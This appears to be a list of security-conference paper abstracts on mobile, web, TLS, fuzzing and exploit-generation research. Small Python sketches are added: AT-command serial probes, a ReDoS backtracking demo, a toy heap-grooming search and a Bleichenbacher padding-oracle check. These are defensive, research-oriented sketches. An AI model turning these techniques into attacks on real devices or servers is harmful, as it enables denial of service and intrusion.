AT commands, originally designed in the early 80s for controlling modems, are still in use in most modern smartphones to support telephony functions. The role of AT commands in these devices has vastly expanded through vendor-specific customizations, yet the extent of their functionality is unclear and poorly documented. In this paper, we systematically retrieve and extract 3,500 AT commands from over 2,000 Android smartphone firmware images across 11 vendors. We methodically test our corpus of AT commands against eight Android devices from four different vendors through their USB interface and characterize the powerful functionality exposed, including the ability to rewrite device firmware, bypass Android security mechanisms, exfiltrate sensitive device information, perform screen unlocks, and inject touch events solely through the use of AT commands. We demonstrate that the AT command interface contains an alarming amount of unconstrained functionality and represents a broad attack surface on Android devices.
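
Probing the exposed interface requires nothing more than a serial terminal. A hedged pyserial sketch in the spirit of the paper's USB test setup (the device path is hypothetical and vendor-dependent, and whether the port answers at all varies per phone; stick to read-only commands):

```python
import serial  # pyserial

PORT = "/dev/ttyACM0"   # hypothetical path; depends on vendor USB config

with serial.Serial(PORT, baudrate=115200, timeout=1) as ser:
    # Read-only probes: basic liveness, device info, and IMEI query.
    for cmd in (b"AT\r", b"ATI\r", b"AT+CGSN\r"):
        ser.write(cmd)
        print(cmd, b"->", ser.read(256))
```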

Charm: Facilitating Dynamic Analysis of Device Drivers of Mobile Systems

Mobile systems, such as smartphones and tablets, incorporate a diverse set of I/O devices, such as camera, audio devices, GPU, and sensors. This in turn results in a large number of diverse and customized device drivers running in the operating system kernel of mobile systems. These device drivers contain various bugs and vulnerabilities, making them a top target for kernel exploits [78]. Unfortunately, security analysts face important challenges in analyzing these device drivers in order to find, understand, and patch vulnerabilities. More specifically, using the state-of-the-art dynamic analysis techniques such as interactive debugging, fuzzing, and record-and-replay for analysis of these drivers is difficult, inefficient, or even completely inaccessible depending on the analysis.

In this paper, we present Charm, a system solution that facilitates dynamic analysis of device drivers of mobile systems. Charm’s key technique is remote device driver execution, which enables the device driver to execute in a virtual machine on a workstation. Charm makes this possible by using the actual mobile system only for servicing the low-level and infrequent I/O operations through a low-latency and customized USB channel. Charm does not require any specialized hardware and is immediately available to analysts. We show that it is feasible to apply Charm to various device drivers, including camera, audio, GPU, and IMU sensor drivers, in different mobile systems, including LG Nexus 5X, Huawei Nexus 6P, and Samsung Galaxy S7. In an extensive evaluation, we show that Charm enhances the usability of fuzzing of device drivers, enables record-and-replay of driver’s execution, and facilitates detailed vulnerability analysis. Altogether, these capabilities have enabled us to find 25 bugs in device drivers, analyze 3 existing ones, and even build an arbitrary-code-execution kernel exploit using one of them.

Inception: System-Wide Security Testing of Real-World Embedded Systems Software

Connected embedded systems are becoming widely deployed, and their security is a serious concern. Current techniques for security testing of embedded software rely either on source code or on binaries. Detecting vulnerabilities by testing binary code is harder, because source code semantics are lost. Unfortunately, in embedded systems, high-level source code (C/C++) is often mixed with hand-written assembly, which cannot be directly handled by current source-based tools.

In this paper we introduce Inception, a framework to perform security testing of complete real-world embedded firmware. Inception introduces novel techniques for symbolic execution in embedded systems. In particular, Inception Translator generates and merges LLVM bitcode from high-level source code, hand-written assembly, binary libraries, and part of the processor hardware behavior. This design reduces differences with real execution as well as the manual effort. The source code semantics are preserved, improving the effectiveness of security checks. Inception Symbolic Virtual Machine, based on KLEE, performs symbolic execution, using several strategies to handle different levels of memory abstractions, interaction with peripherals, and interrupts. Finally, the Inception Debugger is a high-performance JTAG debugger which performs redirection of memory accesses to the real hardware.

We first validate our implementation using 53000 tests comparing Inception’s execution to concrete execution on an Arm Cortex-M3 chip. We then show Inception’s advantages on a benchmark made of 1624 synthetic vulnerable programs, four real-world open source and industrial applications, and 19 demos. We discovered eight crashes and two previously unknown vulnerabilities, demonstrating the effectiveness of Inception as a tool to assist embedded device firmware testing.

Acquisitional Rule-based Engine for Discovering Internet-of-Things Devices

The rapidly increasing landscape of Internet-of-Things (IoT) devices has introduced significant technical challenges for their management and security, as these IoT devices in the wild are from different device types, vendors, and product models. The discovery of IoT devices is the prerequisite for characterizing, monitoring, and protecting these devices. However, manual device annotation impedes large-scale discovery, and device classification based on machine learning requires large training data with labels. Therefore, automatic device discovery and annotation at large scale remains an open problem in IoT. In this paper, we propose an Acquisitional Rule-based Engine (ARE), which can automatically generate rules for discovering and annotating IoT devices without any training data. ARE builds device rules by leveraging application-layer response data from IoT devices and product descriptions in relevant websites for device annotations. We define a transaction as a mapping from a unique response to a product description. To collect the transaction set, ARE extracts relevant terms in the response data as the search queries for crawling websites. ARE uses the association algorithm to generate rules of IoT device annotations in the form of (type, vendor, product). We conduct experiments and three applications to validate the effectiveness of ARE.
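
The rule shape is easy to picture: extract candidate terms from an application-layer response, use them as web-search queries, and record the resulting (type, vendor, product) annotation. A toy sketch with an illustrative banner (the real system additionally filters noisy terms and mines product pages):

```python
import re

# Illustrative banner; real responses vary per device and protocol.
banner = 'Server: Hikvision-Webs\r\nWWW-Authenticate: Basic realm="DS-2CD2042WD"'

# Dash-joined tokens are often model numbers or vendor strings; ARE
# would use such terms as search queries before forming a rule.
terms = re.findall(r"[A-Za-z]+-[A-Za-z0-9]+", banner)
rule = {
    "match": terms,                                       # response keywords
    "annotation": ("camera", "hikvision", "DS-2CD2042WD"),  # (type, vendor, product)
}
print(rule)
```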

Web Applications

A Sense of Time for JavaScript and Node.js: First-Class Timeouts as a Cure for Event Handler Poisoning

The software development community is adopting the Event-Driven Architecture (EDA) to provide scalable web services, most prominently through Node.js. Though the EDA scales well, it comes with an inherent risk: the Event Handler Poisoning (EHP) Denial of Service attack. When an EDA-based server multiplexes many clients onto few threads, a blocked thread (EHP) renders the server unresponsive. EHP attacks are a serious threat, with hundreds of vulnerabilities already reported in the wild.

We make three contributions against EHP attacks. First, we describe EHP attacks, and show that they are a common form of vulnerability in the largest EDA community, the Node.js ecosystem. Second, we design a defense against EHP attacks, First-Class Timeouts, which incorporates timeouts at the EDA framework level. Our Node.cure prototype defends Node.js applications against all known EHP attacks with overheads between 0% and 24% on real applications. Third, we promote EHP awareness in the Node.js community. We analyzed Node.js for vulnerable APIs and documented or corrected them, and our guide on avoiding EHP attacks is available on nodejs.org.

Freezing the Web: A Study of ReDoS Vulnerabilities in JavaScript-based Web Servers

Regular expression denial of service (ReDoS) is a class of algorithmic complexity attacks where matching a regular expression against an attacker-provided input takes unexpectedly long. The single-threaded execution model of JavaScript makes JavaScript-based web servers particularly susceptible to ReDoS attacks. Despite this risk and the increasing popularity of the server-side Node.js platform, there is currently little reported knowledge about the severity of the ReDoS problem in practice. This paper presents a large-scale study of ReDoS vulnerabilities in real-world web sites. Underlying our study is a novel methodology for analyzing the exploitability of deployed servers. The basic idea is to search for previously unknown vulnerabilities in popular libraries, hypothesize how these libraries may be used by servers, and to then craft targeted exploits. In the course of the study, we identify 25 previously unknown vulnerabilities in popular modules and test 2,846 of the most popular websites against them. We find that 339 of these web sites suffer from at least one ReDoS vulnerability. Since a single request can block a vulnerable site for several seconds, and sometimes even much longer, ReDoS poses a serious threat to the availability of these sites. Our results are a call-to-arms for developing techniques to detect and mitigate ReDoS vulnerabilities in JavaScript.
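
Catastrophic backtracking is easy to reproduce locally. Python's re module backtracks much like JavaScript's engine, so the following self-contained timing demo conveys the effect the paper exploits:

```python
import re
import time

# On a non-matching input, the nested quantifier forces the matcher
# to try exponentially many ways to split the run of 'a's.
for n in range(14, 23, 2):
    payload = "a" * n + "!"            # the trailing '!' forces failure
    t0 = time.perf_counter()
    re.match(r"^(a+)+$", payload)
    print(n, f"{time.perf_counter() - t0:.3f}s")  # roughly doubles per step
```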

NAVEX: Precise and Scalable Exploit Generation for Dynamic Web Applications

(No official abstract was provided; the following is taken from the paper.) Modern multi-tier web applications are composed of several dynamic features, which make their vulnerability analysis challenging from a purely static analysis perspective. We describe an approach that overcomes the challenges posed by the dynamic nature of web applications. Our approach combines dynamic analysis that is guided by static analysis techniques in order to automatically identify vulnerabilities and build working exploits. Our approach is implemented and evaluated in NAVEX, a tool that can scale the process of automatic vulnerability analysis and exploit generation to large applications and to multiple classes of vulnerabilities. In our experiments, we were able to use NAVEX on a codebase of 3.2 million lines of PHP code, and construct 204 exploits in the code that was analyzed.

Rampart: Protecting Web Applications from CPU-Exhaustion Denial-of-Service Attacks

Denial-of-Service (DoS) attacks pose a severe threat to the availability of web applications. Traditionally, attackers have employed botnets or amplification techniques to send a significant amount of requests to exhaust a target web server’s resources, and, consequently, prevent it from responding to legitimate requests. However, more recently, highly sophisticated DoS attacks have emerged, in which a single, carefully crafted request results in significant resource consumption and ties up a web application’s back-end components for a non-negligible amount of time. Unfortunately, these attacks require only a few requests to overwhelm an application, which makes them difficult to detect by state-of-the-art detection systems.

In this paper, we present Rampart, which is a defense that protects web applications from sophisticated CPU-exhaustion DoS attacks. Rampart detects and stops sophisticated CPU-exhaustion DoS attacks using statistical methods and function-level program profiling. Furthermore, it synthesizes and deploys filters to block subsequent attacks, and it adaptively updates them to minimize any potentially negative impact on legitimate users.

We implemented Rampart as an extension to the PHP Zend engine. Rampart has negligible performance overhead and it can be deployed for any PHP application without having to modify the application’s source code. To evaluate Rampart’s effectiveness and efficiency, we demonstrate that it protects two of the most popular web applications, WordPress and Drupal, from real-world and synthetic CPU-exhaustion DoS attacks, and we also show that Rampart preserves web server performance with low false positive and false negative rates.

Anonymity

How Do Tor Users Interact With Onion Services?

Onion services are anonymous network services that are exposed over the Tor network. In contrast to conventional Internet services, onion services are private, generally not indexed by search engines, and use self-certifying domain names that are long and difficult for humans to read. In this paper, we study how people perceive, understand, and use onion services based on data from 17 semi-structured interviews and an online survey of 517 users. We find that users have an incomplete mental model of onion services, use these services for anonymity, and have varying trust in onion services in general. Users also have difficulty discovering and tracking onion sites and authenticating them. Finally, users want technical improvements to onion services and better information on how to use them. Our findings suggest various improvements for the security and usability of Tor onion services, including ways to automatically detect phishing of onion services, clearer security indicators, and better ways to manage onion domain names that are difficult to remember.

Towards Predicting Efficient and Anonymous Tor Circuits

The Tor anonymity system provides online privacy for millions of users, but it is slower than typical web browsing. To improve Tor performance, we propose PredicTor, a path selection technique that uses a Random Forest classifier trained on recent measurements of Tor to predict the performance of a proposed path. If the path is predicted to be fast, then the client builds a circuit using those relays. We implemented PredicTor in the Tor source code and show through live Tor experiments and Shadow simulations that PredicTor improves Tor network performance by 11% to 23% compared to Vanilla Tor and by 7% to 13% compared to the previous state-of-the-art scheme. Our experiments show that PredicTor is the first path selection algorithm to dynamically avoid highly congested nodes during times of high congestion and avoid long-distance paths during times of low congestion. We evaluate the anonymity of PredicTor using standard entropy-based and time-to-first-compromise metrics, but these cannot capture the possibility of leakage due to the use of location in path selection. To better address this, we propose a new anonymity metric called CLASI: Client Autonomous System Inference. CLASI is the first anonymity metric in Tor that measures an adversary’s ability to infer client Autonomous Systems (ASes) by fingerprinting circuits at the network, country, and relay level. We find that CLASI shows anonymity loss for location-aware path selection algorithms, where entropy-based metrics show little to no loss of anonymity. Additionally, CLASI indicates that PredicTor has similar sender AS leakage compared to the current Tor path selection algorithm due to PredicTor building circuits that are independent of client location.

BurnBox: Self-Revocable Encryption in a World Of Compelled Access

Dissidents, journalists, and others require technical means to protect their privacy in the face of compelled access to their digital devices (smartphones, laptops, tablets, etc.). For example, authorities increasingly force disclosure of all secrets, including passwords, to search devices upon national border crossings. We therefore present the design, implementation, and evaluation of a new system to help victims of compelled searches. Our system, called BurnBox, provides self-revocable encryption: the user can temporarily disable their access to specific files stored remotely, without revealing which files were revoked during compelled searches, even if the adversary also compromises the cloud storage service. They can later restore access. We formalize the threat model and provide a construction that uses an erasable index, secure erasure of keys, and standard cryptographic tools in order to provide security supported by our formal analysis. We report on a prototype implementation, which showcases the practicality of BurnBox.
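
The self-revocation trick is easiest to see in code. A toy sketch (my simplification; the actual construction uses an erasable index and formally analyzed secure key erasure, and supports later restoration via a separately stored backup, which this omits):

```python
# Files are encrypted under per-file keys kept only in a local, erasable
# index; "revoking" a file means erasing its key, so neither the user nor a
# coercive adversary can decrypt the ciphertext still in cloud storage.
from cryptography.fernet import Fernet

cloud = {}        # remote ciphertexts (survive revocation)
key_index = {}    # local erasable index: filename -> key

def store(name, plaintext: bytes):
    key = Fernet.generate_key()
    key_index[name] = key
    cloud[name] = Fernet(key).encrypt(plaintext)

def revoke(name):
    # In a real system this must be a *secure* erase of the key material.
    del key_index[name]

def read(name) -> bytes:
    return Fernet(key_index[name]).decrypt(cloud[name])

store("diary.txt", b"sensitive notes")
revoke("diary.txt")
# read("diary.txt") now raises KeyError: the ciphertext is inert.
```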

An Empirical Analysis of Anonymity in Zcash

Among the now numerous alternative cryptocurrencies derived from Bitcoin, Zcash is often touted as the one with the strongest anonymity guarantees, due to its basis in well-regarded cryptographic research. In this paper, we examine the extent to which anonymity is achieved in the deployed version of Zcash. We investigate all facets of anonymity in Zcash’s transactions, ranging from its transparent transactions to the interactions with and within its main privacy feature, a shielded pool that acts as the anonymity set for users wishing to spend coins privately. We conclude that while it is possible to use Zcash in a private way, it is also possible to shrink its anonymity set considerably by developing simple heuristics based on identifiable patterns of usage.

Network Defenses

NetHide: Secure and Practical Network Topology Obfuscation

Simple path tracing tools such as traceroute allow malicious users to infer network topologies remotely and use that knowledge to craft advanced denial-of-service (DoS) attacks such as Link-Flooding Attacks (LFAs). Yet, despite the risk, most network operators still allow path tracing as it is an essential network debugging tool.

In this paper, we present NetHide, a network topology obfuscation framework that mitigates LFAs while preserving the practicality of path tracing tools. The key idea behind NetHide is to formulate network obfuscation as a multi-objective optimization problem that allows for a flexible tradeoff between security (encoded as hard constraints) and usability (encoded as soft constraints). While solving this problem exactly is hard, we show that NetHide can obfuscate topologies at scale by only considering a subset of the candidate solutions and without reducing obfuscation quality. In practice, NetHide obfuscates the topology by intercepting and modifying path tracing probes directly in the data plane. We show that this process can be done at line-rate, in a stateless fashion, by leveraging the latest generation of programmable network devices.

We fully implemented NetHide and evaluated it on realistic topologies. Our results show that NetHide is able to obfuscate large topologies (>150 nodes) while preserving near-perfect debugging capabilities. In particular, we show that operators can still precisely trace back >90% of link failures despite obfuscation.

Towards a Secure Zero-rating Framework with Three Parties

Zero-rating services provide users with free access to contracted or affiliated Content Providers (CPs), but also incur new types of free-riding attacks. Specifically, a malicious user can masquerade as a zero-rating CP or alter an existing zero-rating communication to evade charges enforced by the Internet Service Provider (ISP). According to our study, major commercial ISPs, such as T-Mobile, China Mobile, and airport WiFi, are all vulnerable to such free-riding attacks. In this paper, we propose a secure, backward compatible, zero-rating framework, called ZFree, which only allows network traffic authorized by the correct CP to be zero-rated. We perform a formal security analysis using ProVerif, and the results show that ZFree is secure, i.e., preserving both packet integrity and CP server authenticity. We have implemented an open-source prototype of ZFree available at this repository (https://github.com/zfree2018/ZFREE). A working demo is at this link (http://zfree.org/). Our evaluation shows that ZFree is lightweight, scalable and secure.

Fuzzing and Exploit Generation

MoonShine: Optimizing OS Fuzzer Seed Selection with Trace Distillation

OS fuzzers primarily test the system call interface between the OS kernel and user-level applications for security vulnerabilities. The effectiveness of evolutionary OS fuzzers depends heavily on the quality and diversity of their seed system call sequences. However, generating good seeds for OS fuzzing is a hard problem as the behavior of each system call depends heavily on the OS kernel state created by the previously executed system calls. Therefore, popular evolutionary OS fuzzers often rely on hand-coded rules for generating valid seed sequences of system calls that can bootstrap the fuzzing process. Unfortunately, this approach severely restricts the diversity of the seed system call sequences and therefore limits the effectiveness of the fuzzers.

In this paper, we develop MoonShine, a novel strategy for distilling seeds for OS fuzzers from system call traces of real-world programs while still maintaining the dependencies across the system calls. MoonShine leverages light-weight static analysis for efficiently detecting dependencies across different system calls.

We designed and implemented MoonShine as an extension to Syzkaller, a state-of-the-art evolutionary fuzzer for the Linux kernel. Starting from traces containing 2.8 million system calls gathered from 3,220 real-world programs, MoonShine distilled down to just over 14,000 calls while preserving 86% of the original code coverage. Using these distilled seed system call sequences, MoonShine was able to improve Syzkaller’s achieved code coverage for the Linux kernel by 13% on average. MoonShine also found 14 new vulnerabilities in the Linux kernel that were not found by Syzkaller.
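
Stripped of the dependency analysis (which is MoonShine's actual contribution), the distillation step is essentially greedy set cover over per-trace coverage. A toy sketch:

```python
# Greedy coverage-preserving distillation: keep picking the trace that adds
# the most still-uncovered blocks until the union of coverage is preserved.
def distill(traces):
    """traces: list of (syscall_sequence, coverage_set). Returns a small
    subset of sequences that preserves the union of coverage."""
    remaining = set().union(*(cov for _, cov in traces))
    selected = []
    while remaining:
        best = max(traces, key=lambda t: len(t[1] & remaining))
        if not (best[1] & remaining):
            break
        selected.append(best[0])
        remaining -= best[1]
    return selected

traces = [(["open", "read"], {1, 2, 3}),
          (["socket", "bind"], {3, 4}),
          (["open", "mmap"], {1, 2})]
print(distill(traces))  # the third trace adds no new coverage and is dropped
```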

QSYM : A Practical Concolic Execution Engine Tailored for Hybrid Fuzzing

Recently, hybrid fuzzing has been proposed to address the limitations of fuzzing and concolic execution by combining both approaches. The hybrid approach has shown its effectiveness in various synthetic benchmarks such as DARPA Cyber Grand Challenge (CGC) binaries, but it still suffers from scaling to find bugs in complex, real-world software. We observed that the performance bottleneck of the existing concolic executor is the main limiting factor for its adoption beyond a small-scale study.

To overcome this problem, we design a fast concolic execution engine, called QSYM, to support hybrid fuzzing. The key idea is to tightly integrate the symbolic emulation with the native execution using dynamic binary translation, making it possible to implement finer-grained, and thus faster, instruction-level symbolic emulation. Additionally, QSYM loosens the strict soundness requirements of conventional concolic executors for better performance, yet takes advantage of a faster fuzzer for validation, providing unprecedented opportunities for performance optimizations, e.g., optimistically solving constraints and pruning uninteresting basic blocks.

Our evaluation shows that QSYM does not just outperform state-of-the-art fuzzers (i.e., found 14× more bugs than VUzzer in the LAVA-M dataset, and outperformed Driller in 104 binaries out of 126), but also found 13 previously unknown security bugs in eight real-world programs like Dropbox Lepton, ffmpeg, and OpenJPEG, which have already been intensively tested by the state-of-the-art fuzzers, AFL and OSS-Fuzz.

Automatic Heap Layout Manipulation for Exploitation

Heap layout manipulation is integral to exploiting heap-based memory corruption vulnerabilities. In this paper we present the first automatic approach to the problem, based on pseudo-random black-box search. Our approach searches for the inputs required to place the source of a heap-based buffer overflow or underflow next to heap-allocated objects that an exploit developer, or automatic exploit generation system, wishes to read or corrupt. We present a framework for benchmarking heap layout manipulation algorithms, and use it to evaluate our approach on several real-world allocators, showing that pseudo-random black box search can be highly effective. We then present SHRIKE, a novel system that can perform automatic heap layout manipulation on the PHP interpreter and can be used in the construction of control-flow hijacking exploits. Starting from PHP’s regression tests, SHRIKE discovers fragments of PHP code that interact with the interpreter’s heap in useful ways, such as making allocations and deallocations of particular sizes, or allocating objects containing sensitive data, such as pointers. SHRIKE then uses our search algorithm to piece together these fragments into programs, searching for one that achieves a desired heap layout. SHRIKE allows an exploit developer to focus on the higher level concepts in an exploit, and to defer the resolution of heap layout constraints to SHRIKE. We demonstrate this by using SHRIKE in the construction of a control-flow hijacking exploit for the PHP interpreter.
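
To make the search problem concrete, here is a toy version (the real system drives the PHP allocator via discovered PHP code fragments; a trivial LIFO free-list allocator stands in here). The heap starts fragmented, and pseudo-random search looks for an interaction sequence after which the overflow source lands immediately before the corruption target:

```python
import random

class ToyAllocator:
    def __init__(self):
        self.next, self.free_list = 0, []
    def alloc(self):
        if self.free_list:
            return self.free_list.pop()      # LIFO reuse of freed slots
        addr, self.next = self.next, self.next + 16
        return addr
    def free(self, addr):
        self.free_list.append(addr)

def try_sequence(seq):
    a = ToyAllocator()
    slots = [a.alloc() for _ in range(6)]    # pre-existing heap state...
    a.free(slots[1]); a.free(slots[4])       # ...with two holes in it
    held = []
    for op in seq:                           # replay candidate interactions
        if op == "alloc":
            held.append(a.alloc())
        elif held:
            a.free(held.pop())
    src, dst = a.alloc(), a.alloc()          # overflow source, then target
    return dst == src + 16                   # adjacent, in the right order

random.seed(1)
for _ in range(10000):
    seq = random.choices(["alloc", "free"], k=random.randint(0, 6))
    if try_sequence(seq):
        print("heap-grooming sequence found:", seq)
        break
```

Here any sequence that consumes both holes before the final two allocations succeeds; the search has no model of the allocator and finds this purely by trial, which is the paper's black-box premise.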

FUZE: Towards Facilitating Exploit Generation for Kernel Use-After-Free Vulnerabilities

Software vendors usually prioritize their bug remediation based on ease of their exploitation. However, accurately determining exploitability typically takes many hours and requires significant manual effort. To address this issue, automated exploit generation techniques can be adopted. In practice, they however exhibit an insufficient ability to evaluate exploitability, particularly for kernel Use-After-Free (UAF) vulnerabilities. This is mainly because of the complexity of UAF exploitation as well as the scale of an OS kernel.

In this paper, we therefore propose FUZE, a new framework to facilitate the process of kernel UAF exploitation. The design principle behind this technique is that we expect the ease of crafting an exploit could augment a security analyst with the ability to expedite exploitability evaluation. Technically, FUZE utilizes kernel fuzzing along with symbolic execution to identify, analyze and evaluate the system calls valuable and useful for kernel UAF exploitation.

To demonstrate the utility of FUZE, we implement FUZE on a 64-bit Linux system by extending a binary analysis framework and a kernel fuzzer. Using 15 real-world kernel UAF vulnerabilities on Linux systems, we then demonstrate FUZE could not only escalate kernel UAF exploitability but also diversify working exploits. In addition, we show that FUZE could facilitate security mitigation bypassing, making exploitability evaluation less labor-intensive and more efficient.

TLS and PKI

The Secure Socket API: TLS as an Operating System Service

SSL/TLS libraries are notoriously hard for developers to use, leaving system administrators at the mercy of buggy and vulnerable applications. We explore the use of the standard POSIX socket API as a vehicle for a simplified TLS API, while also giving administrators the ability to control applications and tailor TLS configuration to their needs. We first assess OpenSSL and its uses in open source software, recommending how this functionality should be accommodated within the POSIX API. We then propose the Secure Socket API (SSA), a minimalist TLS API built using existing network functions, and find that existing network applications can adopt it with modifications as small as one line of code. We next describe a prototype SSA implementation that leverages network system calls to provide privilege separation and support for other programming languages. We end with a discussion of the benefits and limitations of the SSA and our accompanying implementation, noting avenues for future work.

Return Of Bleichenbacher’s Oracle Threat (ROBOT)

In 1998 Bleichenbacher presented an adaptive chosen-ciphertext attack on the RSA PKCS #1 v1.5 padding scheme. The attack exploits the availability of a server which responds with different messages based on the ciphertext validity. This server is used as an oracle and allows the attacker to decrypt RSA ciphertexts. Given the importance of this attack, countermeasures were defined in TLS and other cryptographic standards using RSA PKCS #1 v1.5.

We perform the first large-scale evaluation of Bleichenbacher’s RSA vulnerability. We show that this vulnerability is still very prevalent in the Internet and affected almost a third of the top 100 domains in the Alexa Top 1 Million list, including Facebook and Paypal.

We identified vulnerable products from nine different vendors and open source projects, among them F5, Citrix, Radware, Palo Alto Networks, IBM, and Cisco. These implementations provide novel side-channels for constructing Bleichenbacher oracles: TCP resets, TCP timeouts, or duplicated alert messages. In order to prove the importance of this attack, we have demonstrated practical exploitation by signing a message with the private key of facebook.com’s HTTPS certificate. Finally, we discuss countermeasures against Bleichenbacher attacks in TLS and recommend deprecating the RSA encryption key exchange in TLS and the RSA PKCS #1 v1.5 standard.
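
For reference, the oracle exists because the server must validate PKCS #1 v1.5 padding after decryption, and any observable difference between the "padding valid" and "padding invalid" outcomes leaks one bit per query. A toy sketch of that check and a leaky response path (illustration only, not an attack tool):

```python
# EM = 0x00 || 0x02 || PS (>= 8 nonzero bytes) || 0x00 || M
def pkcs1_v15_padding_ok(em: bytes) -> bool:
    if len(em) < 11 or em[0] != 0x00 or em[1] != 0x02:
        return False
    try:
        sep = em.index(0x00, 2)   # first zero after the 0x02 byte
    except ValueError:
        return False
    return sep >= 10              # guarantees >= 8 bytes of nonzero padding

# A vulnerable server distinguishes the two cases to the network, e.g. via
# different alerts, TCP resets, or timeouts -- exactly the side channels the
# paper found in the wild:
def vulnerable_server_response(em: bytes) -> str:
    if pkcs1_v15_padding_ok(em):
        return "alert: bad_record_mac"   # padding fine, later check failed
    return "alert: decrypt_error"        # padding bad -> oracle signal
```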

Bamboozling Certificate Authorities with BGP

The Public Key Infrastructure (PKI) protects users from malicious man-in-the-middle attacks by having trusted Certificate Authorities (CAs) vouch for the domain names of servers on the Internet through digitally signed certificates. Ironically, the mechanism CAs use to issue certificates is itself vulnerable to man-in-the-middle attacks by network-level adversaries. Autonomous Systems (ASes) can exploit vulnerabilities in the Border Gateway Protocol (BGP) to hijack traffic destined to a victim’s domain. In this paper, we rigorously analyze attacks that an adversary can use to obtain a bogus certificate. We perform the first real-world demonstration of BGP attacks to obtain bogus certificates from top CAs in an ethical manner. To assess the vulnerability of the PKI, we collect a dataset of 1.8 million certificates and find that an adversary would be capable of gaining a bogus certificate for the vast majority of domains. Finally, we propose and evaluate two countermeasures to secure the PKI: 1) CAs verifying domains from multiple vantage points to make it harder to launch a successful attack, and 2) a BGP monitoring system for CAs to detect suspicious BGP routes and delay certificate issuance to give network operators time to react to BGP attacks.
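
The first countermeasure is straightforward to sketch: perform domain validation from several network vantage points and require quorum agreement, so a BGP hijack that is only visible near one vantage point cannot yield a certificate. A sketch where fetch_challenge() is a hypothetical helper performing an HTTP-01-style check from a given vantage point:

```python
def multi_vantage_validate(domain, expected_token, vantage_points,
                           fetch_challenge, quorum=0.75):
    """Issue only if a quorum of vantage points sees the expected token."""
    agree = 0
    for vp in vantage_points:
        try:
            if fetch_challenge(vp, domain) == expected_token:
                agree += 1
        except Exception:
            pass  # an unreachable vantage point counts as disagreement
    return agree / len(vantage_points) >= quorum
```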

The Broken Shield: Measuring Revocation Effectiveness in the Windows Code-Signing PKI

Recent measurement studies have highlighted security threats against the code-signing public key infrastructure (PKI), such as certificates that had been compromised or issued directly to malware authors. The primary mechanism for mitigating these threats is to revoke the abusive certificates. However, the distributed yet closed nature of the code-signing PKI makes it difficult to evaluate the effectiveness of revocations in this ecosystem. As a consequence, the magnitude of the signed-malware threat is not fully understood.

In this paper, we collect seven datasets, including the largest corpus of code-signing certificates, and we combine them to analyze the revocation process from end to end. Effective revocations rely on three roles: (1) discovering the abusive certificates, (2) revoking the certificates effectively, and (3) disseminating the revocation information for clients. We assess the challenge for discovering compromised certificates and the subsequent revocation delays. We show that erroneously setting revocation dates causes signed malware to remain valid even after the certificate has been revoked. We also report failures in disseminating the revocations, leading clients to continue trusting the revoked certificates.

Vulnerability Mitigations

Debloating Software through Piece-Wise Compilation and Loading

Programs are bloated. Our study shows that only 5% of libc is used on average across the Ubuntu Desktop environment (2016 programs); the heaviest user, vlc media player, only needed 18%. In this paper: (1) We present a debloating framework built on a compiler toolchain that can successfully debloat programs (shared/static libraries and executables). Our solution can successfully compile and load most libraries on Ubuntu Desktop 16.04. (2) We demonstrate the elimination of over 79% of code from coreutils and 86% of code from SPEC CPU 2006 benchmark programs without affecting functionality. We show that even complex programs such as Firefox and curl can be debloated without a need to recompile. (3) We demonstrate the security impact of debloating by eliminating over 71% of reusable code gadgets from the coreutils suite, and show that unused code that contains real-world vulnerabilities can also be successfully eliminated without adverse effects on the program. (4) We incur a low load time overhead.
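
At its core, debloating is reachability analysis over a call graph: keep what the program's entry points can reach, drop the rest. A toy sketch (the real system works piece-wise at compile and load time and must conservatively handle indirect calls and dynamic loading, which this ignores):

```python
def reachable(call_graph, roots):
    """Return all functions reachable from the given entry points."""
    seen, stack = set(), list(roots)
    while stack:
        fn = stack.pop()
        if fn in seen:
            continue
        seen.add(fn)
        stack.extend(call_graph.get(fn, []))
    return seen

# A made-up miniature "libc" call graph for illustration.
libc = {"main": ["printf", "malloc"], "printf": ["vfprintf"],
        "vfprintf": [], "malloc": [], "system": ["fork", "exec"],
        "fork": [], "exec": [], "gets": []}
keep = reachable(libc, ["main"])
print(sorted(set(libc) - keep))  # ['exec', 'fork', 'gets', 'system'] removed
```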

Precise and Accurate Patch Presence Test for Binaries

Patching is the main resort to battle software vulnerabilities. It is critical to ensure that patches are propagated to all affected software timely, which, unfortunately, is often not the case. Thus the capability to accurately test the security patch presence in software distributions is crucial, for both defenders and attackers.

Inspired by human analysts’ practice of inspecting only small, localized code areas, we present FIBER, an automated system that leverages this observation in its core design. FIBER works by first parsing and analyzing the open-source security patches carefully and then generating fine-grained binary signatures that faithfully reflect the most representative syntactic and semantic changes introduced by the patch, which are used to search against target binaries. Compared to previous work, FIBER leverages the source-level insight strategically by primarily focusing on small patch changes and their minimal contexts, instead of the whole function or file. We have systematically evaluated FIBER using 107 real-world security patches and 8 Android kernel images from 3 different mainstream vendors; the results show that FIBER can achieve an average accuracy of 94% with no false positives.

From Patching Delays to Infection Symptoms: Using Risk Profiles for an Early Discovery of Vulnerabilities Exploited in the Wild

At any given time there exist a large number of software vulnerabilities in our computing systems, but only a fraction of them are ultimately exploited in the wild. Advanced knowledge of which vulnerabilities are being or likely to be exploited would allow system administrators to prioritize patch deployments, enterprises to assess their security risk more precisely, and security companies to develop intrusion protection for those vulnerabilities. In this paper, we present a novel method based on the notion of community detection for early discovery of vulnerability exploits. Specifically, on one hand, we use symptomatic botnet data (in the form of a set of spam blacklists) to discover a community structure which reveals how similar Internet entities behave in terms of their malicious activities. On the other hand, we analyze the risk behavior of end-hosts through a set of patch deployment measurements that allow us to assess their risk to different vulnerabilities. The latter is then compared to the former to quantify whether the underlying risks are consistent with the observed global symptomatic community structure, which then allows us to statistically determine whether a given vulnerability is being actively exploited in the wild. Our results show that by observing up to 10 days’ worth of data, we can successfully detect vulnerability exploitation with a true positive rate of 90% and a false positive rate of 10%. Our detection is shown to be much earlier than the standard discovery time records for most vulnerabilities. Experiments also demonstrate that our community based detection algorithm is robust against strategic adversaries.

Understanding the Reproducibility of Crowd-reported Security Vulnerabilities

